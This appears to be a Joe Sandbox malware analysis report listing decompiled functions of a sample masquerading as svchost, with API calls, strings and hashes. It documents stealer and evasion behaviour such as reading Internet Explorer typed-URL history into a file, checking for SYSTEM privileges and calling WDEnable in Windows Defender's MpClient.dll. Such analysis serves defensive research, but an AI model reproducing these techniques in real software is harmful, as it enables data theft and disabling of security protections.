                                                                                                                                                                                                            • Opcode ID: 837fe52d8f96531e792efd769e438687a494a964506d8d084a00e4bcb74075a0
                                                                                                                                                                                                            • Instruction ID: d2d9058f1445d8cf351f5a5261efd48de42c6316710ee31e9748862b917e9faa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 837fe52d8f96531e792efd769e438687a494a964506d8d084a00e4bcb74075a0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45219971E4155467DB11ABA9AC4CBDEB3ACDF89714F1007D5E905D3180DB30DE458BA1
                                                                                                                                                                                                            Function 00401C70 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 00401D1A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 00401D56
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
                                                                                                                                                                                                            • Opcode ID: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                            • Instruction ID: 6b572b3e0c1d36d44cadbb52a12c0b3f1dd55c4915d11e4f0b3c307bdf2881c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC21B972A0111467D7109BA5AD49B9E77A8EF89720F100276EA04F32E0EB34DD4556A9
                                                                                                                                                                                                            Function 02C747E0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 105fileregistryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?,00000000), ref: 02C74803
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7482B
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,755735B0), ref: 02C74862
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,IE history:,0000000C,02C74FAE,00000000), ref: 02C7488C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3BE4,00000001,02C74FAE,00000000), ref: 02C7489E
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C74FAE,00000000), ref: 02C748CA
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C74FAE,00000000), ref: 02C748DC
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C748F7
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C7490D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                            • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                            • API String ID: 4020389783-427538202
                                                                                                                                                                                                            • Opcode ID: 2409a2a58dad3d092fe5c93e69396275017a5f2c59c8dff11b4eff0586436599
                                                                                                                                                                                                            • Instruction ID: 1b95446c8a17b725b57605333fab497b60f51914e9535f3550e19f0a27500698
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2409a2a58dad3d092fe5c93e69396275017a5f2c59c8dff11b4eff0586436599
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF313DB1D4025DBBEB25DF94DC89FEEB77CEF44704F00459AA605A3141E7B05B548BA0
                                                                                                                                                                                                            Function 02C76778 Relevance: 19.6, APIs: 13, Instructions: 140memorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7682E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C76835
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76849
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C76858
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000), ref: 02C7685F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C768D3
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C768D6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C768E3
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C768E6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocBackslashFreePathValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 296989886-0
                                                                                                                                                                                                            • Opcode ID: 003de138684be4deab8547d03c1acd8202abc211a1dd9dbdcb42b19c9d054058
                                                                                                                                                                                                            • Instruction ID: ceb7129cbc7e11362f0d9a47eaf3303412d83b723b6487a64ef2fcbc3bb9f872
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 003de138684be4deab8547d03c1acd8202abc211a1dd9dbdcb42b19c9d054058
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB412971E087865BCB224F309C99BA77FADEF81345F284594ED8687242DB32D60DC791
                                                                                                                                                                                                            Function 02C76570 Relevance: 19.6, APIs: 13, Instructions: 117memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 995291462-0
                                                                                                                                                                                                            • Opcode ID: 3fe15c0747de02ce34ff8e5beb352f5bb594d70fcf48db425afb91261f065212
                                                                                                                                                                                                            • Instruction ID: a6d5ba3fe5b7dc7c35c181564afb746dc971d058794fad2efa10cf46b787aa8d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fe15c0747de02ce34ff8e5beb352f5bb594d70fcf48db425afb91261f065212
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3310372E40254BBDB218FA59C48FABBB7CEF80B14F108658FD14A7280D7308A148BA0
                                                                                                                                                                                                            Function 02C76240 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: 92F358B2a$software\microsoft
                                                                                                                                                                                                            • API String ID: 217510255-920810494
                                                                                                                                                                                                            • Opcode ID: 44ab6c0d8ec864cb4832094607e0000585e37440257ed7e1af13c71dc892abea
                                                                                                                                                                                                            • Instruction ID: 3471b68e4a835b0fa5063bde680b29b635e56a2b8e81eeee3e7ffb16df0b7b1c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44ab6c0d8ec864cb4832094607e0000585e37440257ed7e1af13c71dc892abea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD310871E4026D6AEB26DB649C09BDE7B6CEF04704F100599EA1DE7141E7B08B44CBE1
                                                                                                                                                                                                            Function 02C760E0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76111
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7612F
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02C7614A
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000001,92F358B2a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C76171
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76205
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: 92F358B2a$software\microsoft
                                                                                                                                                                                                            • API String ID: 217510255-920810494
                                                                                                                                                                                                            • Opcode ID: fb9f789d853990c049af5dfef2ec7b45426995e795e6d08b56affd9dba607a23
                                                                                                                                                                                                            • Instruction ID: 01ab0bc2ad4d45cd08dc3ae6a38c052b133b4db611de5721e0a942fd5e20b490
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb9f789d853990c049af5dfef2ec7b45426995e795e6d08b56affd9dba607a23
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41312871E8025C6BDB26DB64DC49FDE7BACEF18704F104598E609E7141E3B08B448BA1
                                                                                                                                                                                                            Function 02C92E00 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,7556F550,00000000,7744C3F0), ref: 02C92E15
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                            • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                            • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E88
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                            • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                            • API String ID: 1998047302-3691563785
                                                                                                                                                                                                            • Opcode ID: 277415a8bfd86d7e02d0b9444cd21f2e95ce17a10e53a131167fe95a68d94b56
                                                                                                                                                                                                            • Instruction ID: 7f2bd8690ff1dfab9be954a6c89663d6062ef08d3c0c7ee721daf379dcadf0f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 277415a8bfd86d7e02d0b9444cd21f2e95ce17a10e53a131167fe95a68d94b56
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C531A171D40288BBEF11CBA1C88CFBE7B7CAF85306F048598ED8667181D7749615CB62
                                                                                                                                                                                                            Function 00401FC0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401FFE
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 00402037
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402046
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040208C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                            • String ID: MpClient.dll$V,@$WDEnable$Windows Defender
                                                                                                                                                                                                            • API String ID: 1010965793-4204822615
                                                                                                                                                                                                            • Opcode ID: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                            • Instruction ID: d5d199d1064221ab56ad58356cdb5c20067bd4798bc980eb12739ab0272296c4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E711A8B1900355ABC7219F649D49FABBB7CFB48751F10067AFB55B21D0D6784E008AA8
                                                                                                                                                                                                            Function 00402560 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004025C0
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00402C95), ref: 0040273D
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402744
                                                                                                                                                                                                            • CoUninitialize.COMBASE ref: 0040279E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                            • String ID: Windows Explorer
                                                                                                                                                                                                            • API String ID: 1140695583-228612681
                                                                                                                                                                                                            • Opcode ID: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                            • Instruction ID: b0f249d7cb80b728101da8bc3454e37707d64e119a9c5dc6a768cd6d24ad7165
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED712D74A00606AFCB10DB99CD84DAFB7B9AF88704B2441A6E504FB3D4D7B5ED42CB94
                                                                                                                                                                                                            Function 02C934A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C934D3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C934E9
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C93501
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
                                                                                                                                                                                                              • Part of subcall function 02C82D50: GetProcessHeap.KERNEL32(00000008,02C93547,00000000,756934D0,7744C3F0,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D6E
                                                                                                                                                                                                              • Part of subcall function 02C82D50: HeapAlloc.KERNEL32(00000000,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D75
                                                                                                                                                                                                              • Part of subcall function 02C82D50: memset.MSVCRT ref: 02C82D85
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
                                                                                                                                                                                                            • StrChrIA.SHLWAPI(?,?,7744C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(7744C3F0,00000001,00000104,?,7744C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02C934B0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$memset$AllocNameProcessUser$ErrorLastlstrcpyn
                                                                                                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                            • API String ID: 3937782766-374730529
                                                                                                                                                                                                            • Opcode ID: dcbabfa9400dc68fbcb5f2ba2501b4ff664f283a69539205937ccd9fc760b11b
                                                                                                                                                                                                            • Instruction ID: 5d39b8423ee337d5eb484f8bc5143e6573950741a925296a020dcb575222c5bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcbabfa9400dc68fbcb5f2ba2501b4ff664f283a69539205937ccd9fc760b11b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF217B72D0014AA7CF12A6549C48BFBB7BD9FC8B05F1005D9E94593140EB70EB058BA1
                                                                                                                                                                                                            Function 02C81330 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75memorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C81347
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7556F550,00000000), ref: 02C8135E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,7556F550,00000000), ref: 02C8136B
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?,?,7556F550,00000000), ref: 02C813A7
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7556F550,00000000), ref: 02C813D1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02C813E0
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,7556F550,00000000), ref: 02C813E3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02C813F0
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,7556F550,00000000), ref: 02C813F3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID: 92f35da2a
                                                                                                                                                                                                            • API String ID: 780088666-2326710769
                                                                                                                                                                                                            • Opcode ID: 47afdaadcf33957278c797cc9d22dbdd61c09cfa1bb999e8302c62257340366a
                                                                                                                                                                                                            • Instruction ID: 874ce55ae577560d7386450904837d24a7f509fa39a457052b45d97fe50e9868
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47afdaadcf33957278c797cc9d22dbdd61c09cfa1bb999e8302c62257340366a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1110671F8425967EB2166259C09FDBBBECDF80B05F044694F98DEB1C0DEE099858BD0
